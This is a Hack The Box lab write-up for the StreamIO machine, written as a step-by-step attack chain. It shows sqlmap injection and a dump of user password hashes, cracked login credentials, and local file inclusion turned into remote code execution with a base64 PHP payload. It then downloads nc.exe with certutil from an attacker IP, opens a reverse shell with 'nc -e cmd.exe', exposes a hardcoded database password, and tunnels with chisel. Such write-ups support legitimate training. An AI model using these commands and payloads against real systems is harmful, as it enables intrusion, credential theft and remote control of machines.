Streamio
writeup: HTB_ StreamIO – Syn's writeups.pdf
Streamio
{image of site}
https://streamio.htb https://streamio.htb/register.php https://streamio.htb/login.php - SQLMAP Discovered username is injectable https://watch.streamio.htb https://watch.streamio.htb/search.php
nmap
sqlmap
Username on https://streamio.htb/login.htb is injectable
Table Scan
sqlmap -r login.req -p username --tables --batch -D STREAMIO
Database: STREAMIO
[2 tables]
+--------+
| movies |
| users |
+--------+
sqlmap -r login.req -p username --columns --batch -D STREAMIO -T users
Database: STREAMIO
Table: users
[4 columns]
+----------+-------+
| Column | Type |
+----------+-------+
| id | int |
| is_staff | bit |
| password | nchar |
| username | nchar |
+----------+-------+
sqlmap -r login.req -p username --columns --batch -D STREAMIO -T users --dump
Database: STREAMIO
Table: users
[4 columns]
+----------+-------+
| Column | Type |
+----------+-------+
| id | int |
| is_staff | bit |
| password | nchar |
| username | nchar |
+----------+-------+
id,is_staff,password,username
3,1,c660060492d9edcaa8332d89c99c9239 ,James
4,1,925e5408ecb67aea449373d668b7359e ,Theodore
5,1,083ffae904143c4796e464dac33c1f7d ,Samantha
6,1,08344b85b329d7efd611b7a7743e8a09 ,Lauren
7,1,d62be0dc82071bccc1322d64ec5b6c51 ,William
8,1,f87d3c0d6c8fd686aacc6627f1f493a5 ,Sabrina
9,1,f03b910e2bd0313a23fdd7575f34a694 ,Robert
10,1,3577c47eb1e12c8ba021611e1280753c ,Thane
11,1,35394484d89fcfdb3c5e447fe749d213 ,Carmon
12,1,54c88b2dbd7b1a84012fabc1a4c73415 ,Barry
13,1,fd78db29173a5cf701bd69027cb9bf6b ,Oliver
14,1,b83439b16f844bd6ffe35c02fe21b3c0 ,Michelle
15,1,0cfaaaafb559f081df2befbe66686de0 ,Gloria
16,1,b22abb47a02b52d5dfa27fb0b534f693 ,Victoria
17,1,1c2b3d8270321140e5153f6637d3ee53 ,Alexendra
18,1,22ee218331afd081b0dcd8115284bae3 ,Baxter
19,1,ef8f3d30a856cf166fb8215aca93e9ff ,Clara
20,1,3961548825e3e21df5646cafe11c6c76 ,Barbra
21,1,ee0b8a0937abd60c2882eacb2f8dc49f ,Lenord
22,1,0049ac57646627b8d7aeaccf8b6a936f ,Austin
23,1,8097cedd612cc37c29db152b6e9edbd3 ,Garfield
24,1,6dcd87740abb64edfa36d170f0d5450d ,Juliette
25,1,bf55e15b119860a6e6b5a164377da719 ,Victor
26,1,7df45a9e3de3863807c026ba48e55fb3 ,Lucifer
27,1,2a4e2cf22dd8fcb45adcb91be1e22ae8 ,Bruno
28,1,ec33265e5fc8c2f1b0c137bb7b3632b5 ,Diablo
29,1,dc332fb5576e9631c9dae83f194f8e70 ,Robin
30,1,384463526d288edcc95fc3701e523bc7 ,Stan
31,1,b779ba15cedfd22a023c4d8bcf5f2332 ,yoshihide
33,0,665a50ac9eaa781e4f7f04199db97a11 ,admin
34,0,098f6bcd4621d373cade4e832627b4f6 ,test
Usernames
Foothold
An intruder attack in burpsuite showed us that we have valid creds for yoshihide:66boysandgirls..
Now when we login we have a valid session cookie
That gets us into the admin panel
clicking through the options I notice the only real difference is in the url ?message ?staff ?movies so I try a few others and locate a ?debug= option
Our intruder attack in burpsuite verifies that we do have LFI through this ?debug parameter
Searching for local files in the serving directory shows two index.php, and master.php
POC of RCE
`curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=<yoshihida's session id>' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" 'https://streamio.htb/admin/?debug=master.php&cmd=dir' | grep '<input name="include" hidden>' -A 9999 |grep '</div>' -B 9999 | tail -n +3 |head -n -1`
After some enumeration I find that I can upload the nc.exe binary with
curl -s -k -X 'POST' -b "PHPSESSID=osm4mg0ik64h3j6u1ghslu2n2i" --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=certutil.exe+-urlcache+-split+-f+http://10.10.14.4/nc.exe+c:\\windows\\temp\\nc.exe"
curl -s -k -X 'POST' -b "PHPSESSID=osm4mg0ik64h3j6u1ghslu2n2i" --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=c:\\windows\\temp\\nc.exe+-e+cmd.exe+10.10.14.4+9002"
and that gives us a shell as the user yoshihide
Checking the files inside the box we see that we have DB creds
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
and
Checking the open ports we see that we most likely have some databases open on 1433
C:\inetpub\streamio.htb\admin>netstat -ta
Active Connections
Proto Local Address Foreign Address State Offload State
TCP 0.0.0.0:80 DC:0 LISTENING InHost
TCP 0.0.0.0:88 DC:0 LISTENING InHost
TCP 0.0.0.0:135 DC:0 LISTENING InHost
TCP 0.0.0.0:389 DC:0 LISTENING InHost
TCP 0.0.0.0:443 DC:0 LISTENING InHost
TCP 0.0.0.0:445 DC:0 LISTENING InHost
TCP 0.0.0.0:464 DC:0 LISTENING InHost
TCP 0.0.0.0:593 DC:0 LISTENING InHost
TCP 0.0.0.0:636 DC:0 LISTENING InHost
TCP 0.0.0.0:1433 DC:0 LISTENING InHost
TCP 0.0.0.0:3268 DC:0 LISTENING InHost
TCP 0.0.0.0:3269 DC:0 LISTENING InHost
TCP 0.0.0.0:5985 DC:0 LISTENING InHost
TCP 0.0.0.0:9389 DC:0 LISTENING InHost
TCP 0.0.0.0:47001 DC:0 LISTENING InHost
TCP 0.0.0.0:49664 DC:0 LISTENING InHost
TCP 0.0.0.0:49665 DC:0 LISTENING InHost
TCP 0.0.0.0:49666 DC:0 LISTENING InHost
TCP 0.0.0.0:49667 DC:0 LISTENING InHost
TCP 0.0.0.0:49673 DC:0 LISTENING InHost
TCP 0.0.0.0:49674 DC:0 LISTENING InHost
TCP 0.0.0.0:49686 DC:0 LISTENING InHost
TCP 0.0.0.0:49701 DC:0 LISTENING InHost
TCP 0.0.0.0:62495 DC:0 LISTENING InHost
TCP 10.10.11.158:53 DC:0 LISTENING InHost
TCP 10.10.11.158:139 DC:0 LISTENING InHost
TCP 10.10.11.158:443 10.10.14.4:38836 ESTABLISHED InHost
TCP 10.10.11.158:65133 10.10.14.4:9002 ESTABLISHED InHost
TCP 127.0.0.1:53 DC:0 LISTENING InHos
Using chisel to reverse tunnel port 1433 out
On Attacking Machine
chisel server -p 8000 --reverse
On Windows Box
chisel.exe client 10.10.14.4:8000 R:1433:127.0.0.1:1433